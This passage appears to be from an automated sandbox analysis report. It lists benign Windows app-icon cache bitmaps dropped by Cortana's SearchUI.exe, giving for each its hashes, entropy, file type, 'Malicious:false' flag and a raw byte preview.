                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................oW7@nX8.mX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.mX9.nX8.oW7@............o[;@vfN...v...................................................................................................v.vfN.o[;@....s[?@vfO.................................................................................................................vfO.s[?@t^@.........................................................................................................................t^@.vaB......................................w...j...e...f...f...g...f...f...f...l...|........................................vaB.zeF.......................h..sS...d................................................q...t............................zeF.}hJ...........................r.................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MSPaint_8wekyb3d8bbwe!Microsoft_MSPaint
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.0938248162210447
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqmTGOF0zoc2BxbvR2aTeuZRQfdDEhnL4Kc0gftUF6sYwua3AjzqQb8Rke:g0zx2PAaTHRSdDyk0gKUseYA4r
                                                                            MD5:597B3071D5D766DB5CF04AE4EBE87E81
                                                                            SHA1:48735C41CC01D95E8875EDCB9ACA3B895B2F1F36
                                                                            SHA-256:4145AEB55AEBF20C63DF0B7D8B743F57C107C8E3CDC4B6024CF2771428D01F31
                                                                            SHA-512:04F2B747B45766F2203A9EFAE31B70CAEFF0ADE90099A0091FECB42ED98CC698D3B68F93228A29C972E4DB02567C5C25BA4E0D52CC0031CE655BB3F9AE0C4B3A
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0..5....=..GU...................................................................................................................3....... ...u..........................................................................................................................|..Ju...q.r............
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PNG image data, 44 x 44, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):440
                                                                            Entropy (8bit):7.2211459644895815
                                                                            Encrypted:false
                                                                            SSDEEP:12:6v/7rRPcmbTOBTd8kTo2UxfzSSaxXg6ja9gcDZFz:eTOBek4xOdXMCcDZFz
                                                                            MD5:822B30A653F0C9D26271E09E2ED8B8B6
                                                                            SHA1:2AD6A5C179F869B9CCF254ADCA179A47C9A21D1F
                                                                            SHA-256:8AB682BD4ACD6F07057C4491381370FD209143EC3EFC8D8E31590805E80A95C8
                                                                            SHA-512:F117721BD819E0FE7CFBB3FBFEE53F3FB052A1A92365482FDF5AEEE733FEE59F47F19102BBC4979C0C74073BFB7B70B46CA105D3FFE0271B63C6A8E982E7736D
                                                                            Malicious:false
                                                                            Preview: .PNG........IHDR...,...,.......Z.....tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx.....0..W.....H..C.H..8A.H.........#.R...0.w..._..w.8.6Y'i.).....+.d..<.n......8..~.._z..>|.?.{;.....%.0.Y...sr[.?V.l$@e[.&D3.e.c&..~..z.....wx&....#...a...tx. .....f8..Q..#..Y.#.m.}qm...0[........6..I..k..............K....)..j!.A.H...#,M....rY.p{.B...Q%.+...%..X./..3o.....I....S..........S..N.-.t...2..Q.5a./.<.\.[B_:.V.....0.....!.....IEND.B`.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_OUTLOOK_EXE_16
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.2015377796533695
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqq5K71Hgy2Q6flPTPsrJhVmM310jbJ2yDJW9fve/HGf5uDjfW:zlgDQoxTP0Vh0jV/H7DjfW
                                                                            MD5:01270AED2D55F14B4B1057C708DE5BF6
                                                                            SHA1:A846B996991FAA606660497F7CF3F587051A6CE3
                                                                            SHA-256:2D2B8B3A877B72C7F2212604D0E1909CB0B3FCDA33BD77F9D4410DD9082AD382
                                                                            SHA-512:829D7115426953926C327F0077359336037A5482A908FAC6793B65EF34ED36A6CAAC04D635833C0857130D60EEE573BA670E6632D328F02ACC1DC27D131E2BED
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.....................................................................................................................................................g.......................................................................................................j...q.6.n.f.l...l...k...l...................................................................................t.0.t.Z.q...q...p...o...o...n...m...m...l...l...........................................................w...w.K.w.x.t...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.7663419026818459
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqyiOwaLRW2M38iBPLgbmfJYnUlco57cyeNAy:xYWj386PLOmfWUlBlcyT
                                                                            MD5:469D342A1DDD43C36ADFF7346ABB9191
                                                                            SHA1:5124B20F37B5AF11F6A7BE0F2003D0A5F226CB5C
                                                                            SHA-256:49B23C050228CBDCDB0A198A5B75068E83DF8335CEADCC5C535A9485919A7913
                                                                            SHA-512:2317F9A398B7F2AB35A02D19AD496DE339BB5973920F539EF69BFEA873C2F0E0139BF20ED8F922B52C6823345AD754CB70A4371005C44E21479F92CD803F3873
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................g..............................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsFeedbackHub_8wekyb3d8bbwe!App
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.4896124497860672
                                                                            Encrypted:false
                                                                            SSDEEP:12:+/qYTLjL+a0UpjaDThUakQYEaalliWpi/qqfBLE5gRunPOq8Q:cq6H+a0UVaDTlkZzkiWQPBLN6PODQ
                                                                            MD5:016AA8E97E705485B22B21E9F3ACA205
                                                                            SHA1:D1C38DA52A6FB715CA10209F84F9B3916427913E
                                                                            SHA-256:517EA3F591684ED651BEE64188C4B0BF91593A1F62993044A62D884108C21F0E
                                                                            SHA-512:5D4E88FAE822415F9B399DCAD8F9B39EE30076B9A42EADE63577DD56659CFFF4A65015E2EB2FCC2F8CBE3E67BC6AEA904CD68E4D1EAD802E45A17B0522D22BFE
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................g..................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsMaps_8wekyb3d8bbwe!App
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.8014741696472236
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqtTPYxvEItnX7FdQE83ZzanX9vvsfRaApdH+aWfRahabEMvEw2P0:Vcdr/letov0fRvD+7Kk1vj
                                                                            MD5:8B2833B8F236498E840DF60EBB8D93FC
                                                                            SHA1:D91BEED5A0D695F1F3988B3B6E2A3AF625E44EAE
                                                                            SHA-256:2F3467F8D0B43677312ED799CBBD24A55A38DEC31D36DDD484CB15F8A00EB8A1
                                                                            SHA-512:6B16B002541D6DA7AEEE5B7EA0ECF32924EC318B4CAE0B71AAFDDF9A4BAA80E9DD9A873FF1FA6B03ABEA257BDF6A21FC0AE5D6577C3648CCE1F7B738C207C3A3
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................A...o...........................m...4...........................................................................................................................................|..........................................................._......................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.165365240752661
                                                                            Encrypted:false
                                                                            SSDEEP:96:EpyLLnUFH4FZGBTVASV5RUVjrOiYk1VteDNIR:ZSmZGBTVASV5+jrOiYG6
                                                                            MD5:97D7481A161966CB002947378806C997
                                                                            SHA1:4112BAC013749F5DB6F3B011CF2E2021993D559E
                                                                            SHA-256:193E06A2449A8F9BAD72098D5FAA8E80EA718C37154AD8226E4CAD4E877022E4
                                                                            SHA-512:E37BC346F1F94DFBBEBB6F09CB87AF2EE944531E23F4D34802EF39D9406C820158F7CE8BCE1E9DDA08DA710FF575CF3297AD078BB93EFB807AC98A8772898AF9
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...................................................................................................................................................................................................................................................................................................p+..................................................................U......f3...U...L...U...d...k2..XE..[Y..\q..b...f...k..n..e..B..............................................mH...Q...Z"..a/..iA..Ze..^z..h...i...m...p..x............................O..z.@.888...............................X...h...k..l...s..z...................................................N.....O..x..R.<<<*.....................Z...............................................................O......N......S.;;;@999(<<<3EEE..........k......................J|..)o...d..&j..Fw....................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.634056273992868
                                                                            Encrypted:false
                                                                            SSDEEP:48:z7eIraSD22gNBqm4xbqLvahelnA/T4kggyYY1BQN/9K3tACW9mBaZhBVaX:zRhDiNImr8hRe6N9yAhHZh/aX
                                                                            MD5:21192A679058AA1E80D0A187DDE5B069
                                                                            SHA1:7115B8A2FCE428548158F97E8588D56F1C846363
                                                                            SHA-256:4A64A59CB3C99A62734F36C1DB15F76296FFDEE04071D67BA15810F7F6780869
                                                                            SHA-512:D63343BB397356EA9E1C0673FA2584EEB45D5C0FAA3DBE6E2180954A2F0FDE74892E31BFD6DA56F6F841DED21605D5BDA600127A32F5FB257AD6D88F84190617
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................#...V...|...................`|||-...o....}|}.rqr.rqr.}|}......i...........................................................|.........................................................................3...........................................k......................................................................................3...................................`......................................................|.............................................................................................................................../.k.f....................................i........................... ..............................................................3.m.i...................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................oW7@nX8.mX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.mX9.nX8.oW7@............o[;@vfN...v...................................................................................................v.vfN.o[;@....s[?@vfO.................................................................................................................vfO.s[?@t^@.........................................................................................................................t^@.vaB......................................w...j...e...f...f...g...f...f...f...l...|........................................vaB.zeF.......................h..sS...d................................................q...t............................zeF.}hJ...........................r.................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_help
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................oW7@nX8.mX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.mX9.nX8.oW7@............o[;@vfN...v...................................................................................................v.vfN.o[;@....s[?@vfO.................................................................................................................vfO.s[?@t^@.........................................................................................................................t^@.vaB......................................w...j...e...f...f...g...f...f...f...l...|........................................vaB.zeF.......................h..sS...d................................................q...t............................zeF.}hJ...........................r.................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\zn=BV5!!!!!!!!!MKKSkSetLanguageFiles_
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.091393886147505
                                                                            Encrypted:false
                                                                            SSDEEP:48:S2p1is1OFe7AzySvvwFeNgrI1hRJnvvDB5AEuSr:tp911Uz3vvwE/75ATS
                                                                            MD5:237FD7FFE25A3DD82A6AD7CCC6D12E73
                                                                            SHA1:BDA3E9C2E3FDB351E6270C823A834C6932475CC4
                                                                            SHA-256:AF90E7F5C4E07B1701584FFECC5FBD2DA33F9E53BC56B30A4C64BD6472A26A87
                                                                            SHA-512:11F71AFC174882D665CF08AC49F0479343E5B6B5C3C513850402B0A4987AFD0F5FEF8BF7F02EEF52DFC1382EAD1B684F75A02BBEBF44E539BD09A40B9CB861E6
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...................................................................................................C...............................".................................................................................L...L............................................L...L...L............................................................A....L...L...W..........................................L...L......................................................................b...L...L...............................5....W...L...L.......<..................................................................L...L.....................................L...L...W....................................................................!....L...L...L..............................y...L...L.......j.....................................................................y...L...L...L...L...L...L...L...L...L...L...L...L........$..........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\zn=BV5!!!!!!!!!MKKSkWxpFiles_
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.753170569098153
                                                                            Encrypted:false
                                                                            SSDEEP:96:1CYL+dvy9+8jXzoEoT7OFOQUIauBk14xj3+45daCP5/gs:4EPLRj3OUJ
                                                                            MD5:0A9C3DB1BAF6D7791EE3C11803AC8F21
                                                                            SHA1:137546ADFA1CB5CB70E7DE8253B3F4F321B2494A
                                                                            SHA-256:546165CA24DAEA0384E16DC18F419D47DE750A66B6258B100112940B96B7A9E7
                                                                            SHA-512:71E54D6D4C3BD055016DAB6D1C828922E936C64201AA461A532DF59CB7F05BACE32D961941B9C5D15AB4D79EF444EA25702B2C27030C83C8FF0A5AEC75C3967B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.<.t.\.}..~..{..r.`.b.F.........................................................................................f.(...!...!..."..."...#..."..."...!...".......V.>.....................................................................K.. .."...$...%...&...&...&...&...%...%...%...%...#...".......,R(.........................................................m..!...#...'...&...&...&...&...&...&...&...&...%...%...%...%.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.216065097062321
                                                                            Encrypted:false
                                                                            SSDEEP:48:MCpCI05HSN3BkCVrFXLCWwTIZqqw2GD3Wjg9b4lvGYuRhqMjFs9oVeFow2WX+H:/LoI3BTXLt7UDWEKl+Y0B58mgk
                                                                            MD5:AE299AE65C392E07340FD6939ACE38C7
                                                                            SHA1:4418C657A947D890C17398AE87919BD7C05FBD37
                                                                            SHA-256:0A3C25129BD35899D42CCFC150451E6A5771316ED9395DAD1927AEBD34EE44F7
                                                                            SHA-512:55BDA87845C246D501EDF9D64691B18B2396751992FC0802F90258370FE15525772A1F5B248159DA079D0C1939837BE6D1E2F005600FB377499B288C0713B8AE
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...#..............}.............................................................................................................xus....#...............................................................................................................................&......................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.5533088519253964
                                                                            Encrypted:false
                                                                            SSDEEP:48:AXE64JGbsmj26RLPl+imd2t8ysMDGS3HM:AXE64JGbXjdRLt+Rd2tUVks
                                                                            MD5:B1DF32151B1B60387CCACB5BD01CB5EE
                                                                            SHA1:B0C61D7B8E31AB66A71BF6C6D39192E43F0D523A
                                                                            SHA-256:353FFD359ACC0A35A112112A3644DFBA91C1EA342B68B3F87E4C953D847471F6
                                                                            SHA-512:CE48D468630C61E8EAB04AD087A68D757A3FACDAAB683D903D334711EC197B6B3A2CB3394491114CBF1CE0B12FC8142B1C1D4B8436666F44D04C897DBEF93F8C
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW................................................................................................................................................................................................................................................................................................................................................................................................fff.YYY.UUU.UUU6QQQ8UUU-NNN.............................................................................................HHH.KKK.FFF.===2gac..~..hhi.ABA.UUU*]]].............................................................................LLL.GGG.EEE;ecc..............vkq.|{|.....UUU.A>Ab^^^#........................................................HHH.BBB.==F.dbbw........................P.l...N.SEN.........aaa.<<<.WWW)\\\.........................................HHH.OKKGvss....................................%.]...Q.=#2...........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.600410387317133
                                                                            Encrypted:false
                                                                            SSDEEP:48:f0ZO820M+ayMepeulAXM587/l9TNz1/nWzVK:fG+0MQMevkM587rnWzV
                                                                            MD5:46749E0919DC3CA91613B12501AD245E
                                                                            SHA1:2E24DACC6F4EBEAA1DAED577697EC1A39AB4F92A
                                                                            SHA-256:AD2C396FF60E2F72284806402D6D6A43B3A4875729B00B7176DF667DEE4AF2C1
                                                                            SHA-512:F3627DC86DAE25C2ACD4AE0890D7D398A0C780327A17A3CEBADC4F92BBDF70128DF4C253860F2037626CFEBB9E88D4E5030ABA930F6E7D240068BDDB95FB738A
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................................................................................................................................................................................`...........P..........................................................................................................@.................... .............................................................................................................{.@......P.......................................................................................................... ....z.............@..........................................................................................................`....u.............p......p............................................??..::.077.@44.X55.`22.`//.`...H++.@,,.(//..................r.P..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.276909222144692
                                                                            Encrypted:false
                                                                            SSDEEP:48:uDI0GgaT2N4m1DhxTp16+VdxQV9KERRRPglcAaKEuy:uE1gs64mx20QTilUK7y
                                                                            MD5:8B231B0466F9AF179CDDC70F2B67E75E
                                                                            SHA1:661A08E398F68F5C55EBE8FF2CFB95A129133BC5
                                                                            SHA-256:BD9AEA762764ACC1427635A4F153549D5F05DFD6EDED9DB57040242C38CD7E9B
                                                                            SHA-512:987E3766E9820627B75E17E5EF32FB02DFFED23DFF59D602D9DAB8C2825E4305C10EF4A2E02E3AC3B5CE0354D956CFFAEF473900D21E7C390F021B063A2878E7
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#ollW....^\Z....................................................................................................4...W***.hff.................ZWV....+...........................................................................3...`111.XXX.~.~.....................................,,*........................................................)...X+++.^^^........................ihh.ZYY...................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.4357632469871415
                                                                            Encrypted:false
                                                                            SSDEEP:96:tf3W49RVwoVPxL7dyn60Vb1QfntaWTF+jy:x3Wi/Lhk60Vb1WtaWTF+
                                                                            MD5:32634BF7F7B43B637151361D3E68BF99
                                                                            SHA1:B1EDC33EB07E7FFAA6E896FF7F49C75FEFE093D9
                                                                            SHA-256:3F073F7C963CE5EBF00D915E6BEFB3290703FF9F4AB45D0C1DDFC3F192B44EE1
                                                                            SHA-512:CA53AA9E640271A10AFFAD3BDCA6754F17D4BE2B6ED6A7DC4E9B0F6E90C173D5E5DFC10ED0A28B4AA26391290E2C596EC8D7B1DC836B9295C49529B75FD4DEFD
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...............................................................................................................................................................-...Q...........................................................................................................#...o..+...F...Z...>... ....Q..................................................................................8.../[..9...B...[.. 0..%c..!X..!X...<...,...<.......................................................................@G......N..'a. *g..&a..%]..!\.. ,..)d...U..#Z...=...+...9...T........+........................................8=k2%)^.."Z..'d.$0x.*.I.'3w.&1m.#.i. )c..(`.."_..".."-i...U..$[...F...0...;...P....l...V...$....................33r.$+ij$+Z.-1[.0?..3A...<..+8|.)7}.*,F..<..'5r.#/n. .m..)i..*f.$'7.@Gk.25G.,.J...'...)...F..#[....O...9..."....................<J..DV..8D..LW..@R..<K..9H..5E..5C..,1N.0@..3@}.:F..AIs.9?[.26X.).Q.. P...[...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.284701546826446
                                                                            Encrypted:false
                                                                            SSDEEP:48:u/7PdXiFXD6A1f2SrQ+LVkwYJlCWX0W/Y2LEtvK4e/JA1:2PVidD6A1fV0MYeWnevK4ey1
                                                                            MD5:DAC979CE64A7375A52F96CE58DCB8EFD
                                                                            SHA1:7B1C275015764F61CEC316358401B5A24FE8EB3E
                                                                            SHA-256:4E00FAC845009C1A60E097E912C586DAAA8C0419A145811B22774ADD2B88A88F
                                                                            SHA-512:7174FAAD79D3707761747396EF6C7C66FD5D46425B72E5E28F25B9B19C31827B403A96392D764F1A7A97233B0DF0A743DF67E15452C80005EC5678CA151F596B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................UUU..mm.mm[.......
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.45223283296259
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqwdbhY673s8Ig5QUig5Q0eEg5I2WO1Y6Lh6sjWVgtRoxlJoNLYoUvGqzqmSQXtP:eB5IFZF0eEQn/GVGwL801vbt
                                                                            MD5:B46C5B5ADD94D92043A86DFEA9515820
                                                                            SHA1:8099F7ED896DA8CA87AC05AA79158B824C4E4C23
                                                                            SHA-256:2DFF20838D273138C02AB65A748D026C157DF532C601100A3768040AE0371072
                                                                            SHA-512:7721F7E75E1A8CA63AF68C2C3E2CFABE494726F93CC9EF0736A3C21DB7E6A3F3E67250A6647EEE56D6CFE57721C1E8A5505091698F8C81B62EFFB64348B5DA83
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...................................................................................................................0....................P...........................................................................................0..............www..........................P...................................................................0..............uuu.SSS.@B@.<G<.kkk...........................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
